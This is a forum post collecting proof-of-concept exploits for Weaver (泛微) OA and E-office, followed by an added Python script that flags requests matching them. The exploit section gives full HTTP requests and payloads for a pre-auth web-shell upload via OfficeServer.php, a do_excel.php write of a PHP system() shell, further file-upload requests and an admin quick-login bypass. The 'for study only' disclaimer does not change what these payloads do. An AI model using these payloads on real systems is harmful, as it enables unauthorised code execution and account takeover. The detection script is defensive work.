吉沃运营专员 posted on 2022-8-4 10:17:44

Weaver (泛微) OA vulnerability PoC collection

The content of this post was collected from the internet; it is for study only and must not be used for illegal purposes!
1. Weaver eoffice10 pre-auth getshell
eoffice10/version.json

<form method="post"
      action="http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
      enctype="multipart/form-data">
  <input type="file" name="FileData"><br><br>
  <input type="text" name="FormData" value="1"><br><br>
  <button type="submit" value="Upload">Upload</button>
</form>
Shell lands at: http[:]//XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg

<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
2. Weaver E-office do_excel.php arbitrary file write
URL:
/WWW/general/charge/charge_list/do_excel.php
Payload:
html=<?php system($_POST);?>
3. Weaver OA uploaderOperate.jsp file upload
/workrelate/plan/util/uploaderOperate.jsp has a file upload vulnerability

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"

1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"

1
------WebKitFormBoundarymVk33liI64J7GQaK--
/defaultroot/officeserverservlet confirmed as a known historical vulnerability (file upload)

Place the file under the site root, then replace the fileid in the request

POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK--
4. Weaver OA 0day: arbitrary admin login
URL:
/mobile/plugin/VerifyQuickLogin.jsp
Payload:
identifier=1&language=1&ipaddress=
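A request-inspection script covering the four PoCs above, added here as an example and not part of the original post. It parses a raw HTTP request, matches the endpoint paths listed in this post (by suffix, so the /WWW web-root prefix also matches) and flags the payload traits each PoC relies on: a script extension or `<?php` tag in an uploaded multipart part, an OfficeServer control blob with OPTION SAVEFILE naming a .php FILENAME, a script tag in the html parameter of do_excel.php, and a VerifyQuickLogin.jsp request carrying an identifier. The host oa.example.test, the label strings and the helper names (parse_request, parse_multipart, inspect_request, scan_all) are my own; the sample requests are constructed from the PoC bodies above.

```python
"""Flag HTTP requests that match the Weaver OA PoCs collected on this page.

Added example, not code from the original post. The endpoint paths come from
the PoCs above; the host name and sample requests are constructed here.
Requests are expected as raw HTTP/1.1 text with CRLF line endings.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint suffixes from the PoCs on this page (suffix match, so a leading
# web-root such as /WWW still matches) with a short label for each.
WATCHED = [
    ("/iWebOffice2015/OfficeServer.php", "eoffice10 OfficeServer.php upload"),
    ("/general/charge/charge_list/do_excel.php", "E-office do_excel.php file write"),
    ("/workrelate/plan/util/uploaderOperate.jsp", "OA uploaderOperate.jsp upload"),
    ("/mobile/plugin/VerifyQuickLogin.jsp", "OA VerifyQuickLogin.jsp quick login"),
]
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|jsp|jspx)$", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\?php|<\?=|<%", re.IGNORECASE)
# The OfficeServer control blob uses single quotes, so it is not valid JSON;
# pull the two fields of interest out with a regex instead of json.loads.
CTRL_FIELD = re.compile(r"""["'](OPTION|FILENAME)["']\s*:\s*["']([^"']*)["']""")


def parse_request(raw):
    """Split a raw request into (method, path, query params, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return method, url.path, parse_qs(url.query), headers, body


def parse_multipart(body, content_type):
    """Yield (field name, filename or None, content) for each multipart part."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return
    delim = "--" + m.group(1)
    for chunk in body.split(delim)[1:]:
        if chunk.startswith("--"):  # closing delimiter
            break
        head, _, content = chunk.lstrip("\r\n").partition("\r\n\r\n")
        name = re.search(r';\s*name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        if content.endswith("\r\n"):
            content = content[:-2]
        yield (name.group(1) if name else "", fname.group(1) if fname else None, content)


def inspect_request(raw):
    """Return the indicators found in one request; an empty list means none."""
    method, path, params, headers, body = parse_request(raw)
    label = next((lbl for sfx, lbl in WATCHED if path.lower().endswith(sfx.lower())), None)
    if label is None:
        return []
    findings = [f"{method} {path} ({label})"]
    ctype = headers.get("content-type", "")
    if ctype.lower().startswith("multipart/form-data"):
        for name, fname, content in parse_multipart(body, ctype):
            if fname and SCRIPT_EXT.search(fname):
                findings.append(f"script filename in part {name!r}: {fname}")
            if SCRIPT_TAG.search(content):
                findings.append(f"server-side script tag in part {name!r}")
            ctrl = dict(CTRL_FIELD.findall(content))
            if ctrl.get("OPTION") == "SAVEFILE" and SCRIPT_EXT.search(ctrl.get("FILENAME", "")):
                findings.append(f"SAVEFILE control blob naming {ctrl['FILENAME']}")
    else:
        params.update(parse_qs(body))  # urlencoded body, merged with the query
        for key, values in params.items():
            if any(SCRIPT_TAG.search(v) for v in values):
                findings.append(f"server-side script tag in parameter {key!r}")
        if path.endswith("VerifyQuickLogin.jsp") and "identifier" in params:
            findings.append(f"quick login by identifier={params['identifier'][0]}")
    return findings


# Constructed sample traffic: three PoC bodies from this page on a placeholder
# host, plus a benign version-fingerprint request that must not be flagged.
B = "----WebKitFormBoundaryJjb5ZAJOOXO7fwjs"
SAMPLES = {
    "eoffice10_upload": (
        "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1\r\n"
        f"Host: oa.example.test:8010\r\nContent-Type: multipart/form-data; boundary={B}\r\n\r\n"
        f'--{B}\r\nContent-Disposition: form-data; name="FileData"; filename="1.jpg"\r\n'
        "Content-Type: image/jpeg\r\n\r\n<?php echo md5(1);?>\r\n"
        f'--{B}\r\nContent-Disposition: form-data; name="FormData"\r\n\r\n'
        "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}\r\n"
        f"--{B}--\r\n"
    ),
    "do_excel_write": (
        "POST /WWW/general/charge/charge_list/do_excel.php HTTP/1.1\r\nHost: oa.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\nhtml=<?php system($_POST);?>"
    ),
    "quick_login": (
        "POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1\r\nHost: oa.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\nidentifier=1&language=1&ipaddress="
    ),
    "benign_fingerprint": "GET /eoffice10/version.json HTTP/1.1\r\nHost: oa.example.test\r\n\r\n",
}


def scan_all(samples=SAMPLES):
    """Run inspect_request over every sample and return {name: findings}."""
    return {name: inspect_request(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name}: {hits or 'clean'}")
```

The path match on its own only says a watched endpoint was hit, which legitimate iWebOffice and plan-upload traffic does too; the payload checks (script extension, script tag, SAVEFILE with a .php FILENAME) are what separate the PoCs from normal use, so alert on those and treat the bare path hit as context.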